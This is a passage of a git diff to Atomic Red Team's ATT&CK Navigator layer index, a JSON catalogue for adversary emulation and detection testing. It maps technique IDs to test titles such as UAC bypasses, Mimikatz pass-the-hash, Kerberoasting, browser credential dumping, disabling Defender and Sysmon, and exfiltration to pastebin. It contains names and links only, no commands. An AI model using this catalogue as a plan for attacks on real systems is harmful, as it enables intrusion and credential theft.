Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"comment":"\n- Print Processors\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"comment":"\n- HKLM - Add atomic_test key to launch executable as part of user setup\n- HKLM - Add malicious StubPath value to existing Active Setup Entry\n- HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":1,"enabled":true,"comment":"\n- Persistence by modifying Windows Terminal profile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.002","score":26,"enabled":true,"comment":"\n- Bypass UAC using Event Viewer (cmd)\n- Bypass UAC using Event Viewer (PowerShell)\n- Bypass UAC using Fodhelper\n- Bypass UAC using Fodhelper - PowerShell\n- Bypass UAC using ComputerDefaults (PowerShell)\n- Bypass UAC by Mocking Trusted Directories\n- Bypass UAC using sdclt DelegateExecute\n- Disable UAC using reg.exe\n- Bypass UAC using SilentCleanup task\n- UACME Bypass Method 23\n- UACME Bypass Method 31\n- UACME Bypass Method 33\n- UACME Bypass Method 34\n- UACME Bypass Method 39\n- UACME Bypass Method 56\n- UACME Bypass Method 59\n- UACME Bypass Method 61\n- WinPwn - UAC Magic\n- WinPwn - UAC Bypass ccmstp technique\n- WinPwn - UAC Bypass DiskCleanup technique\n- WinPwn - UAC Bypass DccwBypassUAC technique\n- Disable 
UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key\n- UAC Bypass with WSReset Registry Modification\n- Disable UAC - Switch to the secure desktop when prompting for elevation via registry key\n- Disable UAC notification via registry keys\n- Disable ConsentPromptBehaviorAdmin via registry keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"comment":"\n- Mimikatz Pass the Hash\n- crackmapexec Pass the Hash\n- Invoke-WMIExec Pass the Hash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"comment":"\n- Mimikatz Kerberos Ticket Attack\n- Rubeus Kerberos Pass The Ticket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":8,"enabled":true,"comment":"\n- Extracting passwords with findstr\n- Access unattend.xml\n- WinPwn - sensitivefiles\n- WinPwn - Snaffler\n- WinPwn - powershellsensitive\n- WinPwn - passhunt\n- WinPwn - SessionGopher\n- WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"comment":"\n- Enumeration for Credentials in Registry\n- Enumeration for PuTTY Credentials in 
Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.004","score":7,"enabled":true,"comment":"\n- Private Keys\n- ADFS token signing and encryption certificates theft - Local\n- ADFS token signing and encryption certificates theft - Remote\n- CertUtil ExportPFX\n- Export Root Certificate with Export-PFXCertificate\n- Export Root Certificate with Export-Certificate\n- Export Certificates with Mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"comment":"\n- GPP Passwords (findstr)\n- GPP Passwords (Get-GPPPassword)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1553","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.003","score":1,"enabled":true,"comment":"\n- SIP (Subject Interface Package) Hijacking via Custom DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.003/T1553.003.md"}]},{"techniqueID":"T1553.004","score":3,"enabled":true,"comment":"\n- Install root CA on Windows\n- Install root CA on Windows with certutil\n- Add Root Certificate to CurrentUser Certificate Store\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"comment":"\n- Mount ISO image\n- Mount an ISO image and run executable from the ISO\n- Remove the Zone.Identifier alternate data stream\n- Execute LNK file from ISO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":24,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}],"comment":"\n- Extract Windows Credential Manager via VBA\n- Dump credentials from Windows Credential Manager With PowerShell [windows Credentials]\n- Dump credentials from Windows Credential Manager With PowerShell [web Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials]\n- Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials]\n- WinPwn - Loot local Credentials - lazagne\n- WinPwn - Loot local Credentials - Wifi Credentials\n- WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords\n"},{"techniqueID":"T1555.003","score":14,"enabled":true,"comment":"\n- Run Chrome-password Collector\n- LaZagne - Credentials from Browser\n- Simulating access to Chrome Login Data\n- Simulating access to Opera Login Data\n- Simulating access to Windows Firefox Login Data\n- Simulating access to Windows Edge Login Data\n- Decrypt Mozilla Passwords with Firepwd.py\n- Stage Popular Credential Files for Exfiltration\n- WinPwn - BrowserPwn\n- WinPwn - Loot local Credentials - mimi-kittenz\n- WinPwn - PowerSharpPack - Sharpweb for Browser Credentials\n- WebBrowserPassView - Credentials from Browser\n- BrowserStealer (Chrome / Firefox / Microsoft Edge)\n- Dump Chrome Login Data with esentutl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"comment":"\n- Access Saved Credentials via VaultCmd\n- WinPwn - Loot local Credentials - Invoke-WCMDump\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"comment":"\n- Install and Register Password Filter DLL\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"comment":"\n- LLMNR Poisoning with Inveigh (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"comment":"\n- Crafting Active Directory golden tickets with mimikatz\n- Crafting Active Directory golden tickets with Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"comment":"\n- Crafting Active Directory silver tickets with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"comment":"\n- Request for service tickets\n- Rubeus kerberoast\n- Extract all accounts in use as SPN using setspn\n- Request A Single Ticket via PowerShell\n- Request All Tickets via PowerShell\n- WinPwn - Kerberoasting\n- WinPwn - PowerSharpPack - 
Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"comment":"\n- Rubeus asreproast\n- Get-DomainUser with PowerView\n- WinPwn - PowerSharpPack - Kerberoasting Using Rubeus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}],"comment":"\n- Cobalt Strike Artifact Kit pipe\n- Cobalt Strike Lateral Movement (psexec_psh) pipe\n- Cobalt Strike SSH (postex_ssh) pipe\n- Cobalt Strike post-exploitation pipe (4.2 and later)\n- Cobalt Strike post-exploitation pipe (before 4.2)\n"},{"techniqueID":"T1559.002","score":3,"enabled":true,"comment":"\n- Execute Commands\n- Execute PowerShell script via Word DDE\n- DDEAUTO\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}],"comment":"\n- Compress Data for Exfiltration With PowerShell\n"},{"techniqueID":"T1560.001","score":5,"enabled":true,"comment":"\n- Compress Data for Exfiltration With Rar\n- Compress Data and lock with password for Exfiltration with winrar\n- Compress Data and lock with password for Exfiltration with winzip\n- Compress Data and lock with password for Exfiltration with 7zip\n- ESXi - Remove Syslog remote IP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1562","score":58,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}],"comment":"\n- Windows Disable LSA Protection\n"},{"techniqueID":"T1562.001","score":33,"enabled":true,"comment":"\n- Unload Sysmon Filter Driver\n- Uninstall Sysmon\n- AMSI Bypass - AMSI InitFailed\n- AMSI Bypass - Remove AMSI Provider Reg Key\n- Disable Arbitrary Security Windows Service\n- Tamper with Windows Defender ATP PowerShell\n- Tamper with Windows Defender Command Prompt\n- Tamper with Windows Defender Registry\n- Disable Microsoft Office Security Features\n- Remove Windows Defender Definition Files\n- Stop and Remove Arbitrary Security Windows Service\n- Uninstall Crowdstrike Falcon on Windows\n- Tamper with Windows Defender Evade Scanning -Folder\n- Tamper with Windows Defender Evade Scanning -Extension\n- Tamper with Windows Defender Evade Scanning -Process\n- Disable Windows Defender with DISM\n- Disable Defender Using NirSoft AdvancedRun\n- Kill antimalware protected processes using Backstab\n- WinPwn - Kill the event log services for stealth\n- Tamper with Windows Defender ATP using Aliases - PowerShell\n- LockBit Black - Disable Privacy Settings Experience Using Registry -cmd\n- LockBit Black - Use Registry Editor to turn on automatic logon -cmd\n- LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell\n- Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell\n- Disable Windows Defender with PwSh Disable-WindowsOptionalFeature\n- WMIC Tamper with Windows Defender Evade Scanning Folder\n- Delete Windows Defender Scheduled Tasks\n- Disable Hypervisor-Enforced Code Integrity (HVCI)\n- AMSI Bypass - Override AMSI via COM\n- Tamper with Windows Defender Registry - Reg.exe\n- Tamper with Windows Defender Registry - Powershell\n- Delete Microsoft Defender ASR Rules - InTune\n- Delete Microsoft Defender ASR Rules - GPO\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"comment":"\n- Disable Windows IIS HTTP Logging\n- Disable Windows IIS HTTP Logging via PowerShell\n- Kill Event Log Service Threads\n- Impair Windows Audit Log Policy\n- Clear Windows Audit Policy Config\n- Disable Event Logging with wevtutil\n- Makes Eventlog blind with Phant0m\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.004","score":10,"enabled":true,"comment":"\n- Disable Microsoft Defender Firewall\n- Disable Microsoft Defender Firewall via Registry\n- Allow SMB and RDP on Microsoft Defender Firewall\n- Opening ports for proxy - HARDRAIN\n- Open a local port through Windows Firewall to any profile\n- Allow Executable Through Firewall Located in Non-Standard Location\n- LockBit Black - Unusual Windows firewall registry modification -cmd\n- LockBit Black - Unusual Windows firewall registry modification -Powershell\n- Blackbit - Disable Windows Firewall using netsh firewall\n- ESXi - Disable Firewall via Esxcli\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":5,"enabled":true,"comment":"\n- Disable Powershell ETW Provider - Windows\n- Disable .NET Event Tracing for Windows Via Registry (cmd)\n- Disable .NET Event Tracing for Windows Via Registry (powershell)\n- LockBit Black - Disable the ETW Provider of Windows Defender -cmd\n- LockBit Black - Disable the ETW Provider of Windows Defender -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"comment":"\n- Safe Mode Boot\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1562.010","score":1,"enabled":true,"comment":"\n- PowerShell Version 2 Downgrade\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.010/T1562.010.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"comment":"\n- RDP hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}],"comment":"\n- Extract binary files via VBA\n- Create a Hidden User Called \"$\"\n- Create an \"Administrator \" user (with a space on the end)\n- Create and Hide a Service with sc.exe\n- Command Execution with NirCmd\n"},{"techniqueID":"T1564.001","score":5,"enabled":true,"comment":"\n- Create Windows System File with Attrib\n- Create Windows Hidden File with Attrib\n- Hide Files Through Registry\n- Create Windows Hidden File with powershell\n- Create Windows System File with powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":1,"enabled":true,"comment":"\n- Create Hidden User in Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":2,"enabled":true,"comment":"\n- Hidden Window\n- Headless Browser Accessing Mockbin\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":5,"enabled":true,"comment":"\n- Alternate Data Streams (ADS)\n- Store file in Alternate Data Stream (ADS)\n- Create ADS command prompt\n- Create ADS PowerShell\n- Create Hidden Directory via $index_allocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"comment":"\n- Register Portable Virtualbox\n- Create and start VirtualBox virtual machine\n- Create and start Hyper-V virtual machine\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"comment":"\n- Download Macro-Enabled Phishing Attachment\n- Word spawned a command shell and used an IP address in the command line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data with rclone to cloud Storage - Mega (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1567.003","score":1,"enabled":true,"comment":"\n- Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows)\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.003/T1567.003.md"}]},{"techniqueID":"T1569","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":5,"enabled":true,"comment":"\n- Execute a Command as a Service\n- Use PsExec to execute a command on a remote host\n- BlackCat pre-encryption cmds with Lateral Movement\n- Use RemCom to execute a command on a remote host\n- Snake Malware Service Create\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"comment":"\n- Exfiltration Over SMB over QUIC (New-SmbMapping)\n- Exfiltration Over SMB over QUIC (NET USE)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"comment":"\n- DNS over HTTPS Large Query Volume\n- DNS over HTTPS Regular Beaconing\n- DNS over HTTPS Long Domain Query\n- run ngrok\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"comment":"\n- OpenSSL C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"comment":"\n- DLL Search 
Order Hijacking - amsi.dll\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"comment":"\n- DLL Side-Loading using the Notepad++ GUP.exe binary\n- DLL Side-Loading using the dotnet startup hook environment variable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"comment":"\n- powerShell Persistence via hijacking default modules - Get-Variable.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"comment":"\n- Execution of program.exe as service with unquoted service path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"comment":"\n- Service Registry Permissions Weakness\n- Service ImagePath Change with reg.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"comment":"\n- User scope COR_PROFILER\n- System Scope COR_PROFILER\n- Registry-free process scope COR_PROFILER\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"comment":"\n- Enumerate PlugNPlay Camera\n","links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1614","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":2,"enabled":true,"comment":"\n- Discover System Language by Registry Query\n- Discover System Language with chcp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"comment":"\n- Display group policy information via gpresult\n- Get-DomainGPO to display group policy information via PowerView\n- WinPwn - GPOAudit\n- WinPwn - GPORemoteAccessPolicy\n- MSFT Get-GPO Cmdlet\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"comment":"\n- WinPwn - Reflectively load Mimik@tz into memory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"comment":"\n- Staging Local Certificates via Export-Certificate\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]},{"techniqueID":"T1654","score":2,"enabled":true,"comment":"\n- Get-EventLog To Enumerate Windows Security Log\n- Enumerate Windows Security Log via WevtUtil\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1654/T1654.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 73e9ecac00..646c375897 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"name":"Atomic Red Team","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":49,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.001","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1003.007","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":5,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":21,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.004/T1021.004.md"}]},{"techniqueID":"T1021.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.005/T1021.005.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}]},{"techniqueID":"T1027.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"links":[{"label":"View 
